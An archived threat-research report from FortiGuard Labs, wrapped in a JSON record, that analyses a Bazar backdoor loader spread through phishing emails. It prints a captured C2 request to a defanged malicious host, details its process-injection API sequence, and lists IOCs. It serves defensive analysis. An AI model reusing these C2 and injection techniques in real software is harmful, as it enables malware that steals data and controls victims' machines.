{
	"id": "9bd6bf20-dc41-4e1f-a1a5-fad8822124cc",
	"created_at": "2026-04-06T00:09:49.204227Z",
	"updated_at": "2026-04-10T03:21:57.937385Z",
	"deleted_at": null,
	"sha1_hash": "1acd62c26cf25999b9926b82098980859db50175",
	"title": "New Bazar Trojan Variant is Being Spread in Recent Phishing Campaign – Part I | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2057242,
	"plain_text": "New Bazar Trojan Variant is Being Spread in Recent Phishing Campaign – Part I | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2021-02-12 · Archived: 2026-04-05 20:16:40 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows users\r\nImpact: Control and collect sensitive information from the victim’s device, as well as deliver other malware.\r\nSeverity level: Critical\r\nBazar (which has been classified as the Team9 malware family, developed by the group behind TrickBot) is a backdoor Trojan designed to target a device, collect sensitive information, control the system via commands, and deliver malware. Last year, it was observed delivering the TrickBot malware.\r\nFortiGuard Labs recently noticed a suspicious email through the SPAM monitoring system. This email was designed to entice a victim into opening a web page to download an executable file. Additional research on this executable file found that it is a new variant of Bazar. In this post you can expect to learn what new techniques this Bazar uses to perform anti-analysis, how it communicates with its C2 server, what sensitive data it is able to collect from the victim’s device, and how it is able to deliver other malware onto the victim’s system.\r\nPhishing Email and Download Page\r\nTo validate our assessment, we captured some of Bazar’s previous phishing emails, and their contents are similar. They lure the recipient into opening a webpage to view a PDF version of a fake bonus report, fake customer complaint report, fake billing statement, etc. You can see two examples in the following figures, which were captured on Jan 20 and Jan 27, 2021.\r\nFigure 1.1 Bazar phishing email captured on Jan 20, 2021\r\nhttps://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I\r\nPage 1 of 7\r\nFigure 1.2 Bazar phishing email on Jan 27, 2021\r\nOnce the victim clicks any hyperlink in the email, it brings the victim to a malicious webpage, as shown in Figure 1.3.\r\nFigure 1.3 Webpage that downloads the Bazar malware\r\nThere are three hyperlinks, circled on the webpage image above, all of which point to the same download link. One instance of the download hyperlinks looks like this:\r\nhttps[:]//doc-14-6g-docs[.]googleusercontent.com/docs/securesc/m4jlrke7n9hladu0avuh39vorb58jrve/fgl9fo0g0p5o35at5vboiccqq552hmqf/1611168150000/162233290701768ISzpp4XoG-jfSs?e=download\u0026authuser=0\u0026nonce=nvmpahs236rou\u0026user=11832846407481787782\u0026hash=5ctf3a9bet7iv3njj965vh0c16pumigi\r\nDownloaded Bazar Loader\r\nThe downloaded file (Priview_report20-01[.]exe) is an executable file that uses a PDF document-like icon to deceive the intended victim. By default, Windows hides the actual extension (for example, “.exe”).\r\nFigure 2.1 shows a quick analysis of the file. The left side of the image shows what the victim sees, and the right side shows what the researchers see in a PE analysis tool. (PE, or Portable Executable, is the native format of executable binaries [DLLs, drivers and programs] for the Microsoft Windows® 32-bit operating systems.)\r\nFigure 2.1 The downloaded Bazar loader in an analysis tool\r\nThe victim may assume the file is a real PDF document and double click on it to open the “report” without realizing that an executable file is being run in the background.\r\nThe downloaded executable file is recognized as a 64-bit file in the analysis tool, which means it is only able to execute on 64-bit Microsoft Windows operating systems.\r\nAfter analyzing this file, I realized that it is a loader for Bazar.\r\nOnce the Bazar loader starts, an encrypted resource hidden in the “Font Directory” with the ID “339” (hex 153H) is loaded into its memory. In Figure 2.2 you can see the resource data shown in an analysis tool.\r\nFigure 2.2. Encrypted Resource 339 of Bazar loader\r\nDecrypting the resource data uncovers a piece of ASM (assembly language) code and a PE file. This ASM code, called by the Bazar loader, dynamically deploys the PE file into memory and executes it. Figure 2.3 is a screenshot of a debugger showing where the ASM code was about to call the OEP (Original Entry Point) of the deployed PE file. This PE file is the real Bazar loader.\r\nFigure 2.3. Calling the OEP of the deployed PE file\r\nDeeper Dive into the Bazar Loader\r\nThe real Bazar loader then initiates communication with its C2 server. The host and URL strings are decrypted from constant data on the stack.\r\nFigure 3.1. A display of the decrypted host string of the C2 server\r\nFigure 3.1 above shows the just-decrypted C2 host string with the port number (englewoodcarwashh[.]us:443) in the memory sub-window. It later calls the API getaddrinfo(C2_host_string) to obtain the IP address of the C2 server.\r\nIt sends a GET request with the URL “/cgi-bin/req5” to its C2 server using the SSL protocol. Figure 3.2 is a screenshot of a debugger showing the moment it was about to call the API EncryptMessage() to encrypt the entire GET request.\r\nFigure 3.2. An encrypted packet sent to the C2 server\r\nI copied the packet below for a clearer view:\r\nGET /cgi-bin/req5 HTTP/1.1\r\nHost: englewoodcarwashh[.]us\r\nUser-Agent: user_agent\r\nDate: Wed, 20 Jan 2021 21:05:11 GMT\r\nrvpoft: z3qTFLIkBrYVD3igIKy1kAS99rBL0V35k8NKFUG1dQGVw4ICpFV8y9cAiVS%2FAu6RTpaHgZRVuWMsnLVhpTZaRMdnvCDvJrOqKhawD\r\nConnection: Keep-Alive\r\nYou may have noticed that the value of “rvpoft” is base64 encoded. It is a hash of the “Date:” value (“Wed, 20 Jan 2021 21:05:11 GMT”). By recalculating the hash of the “Date:” value and comparing it with the hash value that “rvpoft” carries, the C2 server is able to verify whether the packet came from its true client.\r\nFigure 3.3. The decrypted Bazar payload returned from the C2 server\r\nOnce it passes packet verification, the C2 server replies with an encrypted Bazar payload to the client (Bazar loader). This is decrypted in the API function BCryptDecrypt(), which is called by the Bazar loader. Figure 3.3, above, shows the just-decrypted Bazar payload PE file in the memory sub-window at the bottom.\r\nThe payload file is an EXE file, which will be injected into a newly-created “cmd.exe” process to hide its real process from being noticed by the victim. To do this, the Bazar loader calls the API CreateProcessA() to create a “cmd” process with a CreateFlags value of “0x80014”, which is a combination of “EXTENDED_STARTUPINFO_PRESENT, CREATE_NEW_CONSOLE, and CREATE_SUSPENDED”. Refer to Figure 3.4, below, for more details.\r\nFigure 3.4. Creating the “cmd.exe” process by calling the API CreateProcessA()\r\nTo inject the Bazar payload into the newly-created “cmd.exe” process and execute it, it needs to call some relevant APIs, like NtGetContextThread(), VirtualAllocEx(), NtUnmapViewOfSection(), NtWriteVirtualMemory(), ZwSetContextThread(), and ZwResumeThread().\r\nConclusion\r\nThis is part I of our analysis of this new Bazar variant. In this post, I explained how a Bazar loader was spread in a phishing campaign. I showed how the Bazar loader communicates with its C2 server to download the Bazar payload. I also presented how the payload file is deployed in a newly-created “cmd.exe” process.\r\nI will provide an analysis of the Bazar payload file running in “cmd.exe” in part II of this analysis. In that report you will learn how Bazar communicates with its C2 server and what actions Bazar can perform on a victim’s device via commands received from its C2 server.\r\nFortinet Protections\r\nFortinet customers are already protected from this Bazar variant with FortiGuard’s Web Filtering and AntiVirus services as follows:\r\nThe Bazar loader download URLs are rated as \"Malicious Websites\" by the FortiGuard Web Filtering service.\r\nThe downloaded files are detected as \"W64/Bazar.CFI!tr\" and blocked by the FortiGuard AntiVirus service.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient and FortiEDR. The Fortinet AntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nWe also suggest that our readers go through the free NSE training -- NSE 1 – Information Security Awareness, which has a module on Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIOCs:\r\nURLs\r\nhxxps[:]//complaintsreport2020[.]gr8[.]com/\r\nhxxps[:]//app[.]getresponse[.]com/lpc_unpublish.html\r\nhxxps[:]//englewoodcarwashh[.]us:443/cgi-bin/req5\r\nSample SHA-256\r\n[Preview_report20-01.exe]\r\n0BFB64DFF37DD50449AF75EC204F0B4981AC3B16790458F6A492C7B27905A9A7\r\n[Print-report27-01.exe]\r\n6E6C0EBC1BB2D99CE358612572F4BCF52578527EEEF6629FFCE81B35F5FA1A99\r\nLearn more about FortiGuard Labs threat research and the FortiGuard Security Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training initiative or about the Fortinet NSE Training program, Security Academy program, and Veterans program.\r\nSource: https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I"
	],
	"report_names": [
		"new-bazar-trojan-variant-is-being-spread-in-recent-phishing-campaign-part-I"
	],
	"threat_actors": [],
	"ts_created_at": 1775434189,
	"ts_updated_at": 1775791317,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.pdf",
		"text": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.txt",
		"img": "https://archive.orkl.eu/1acd62c26cf25999b9926b82098980859db50175.jpg"
	}
}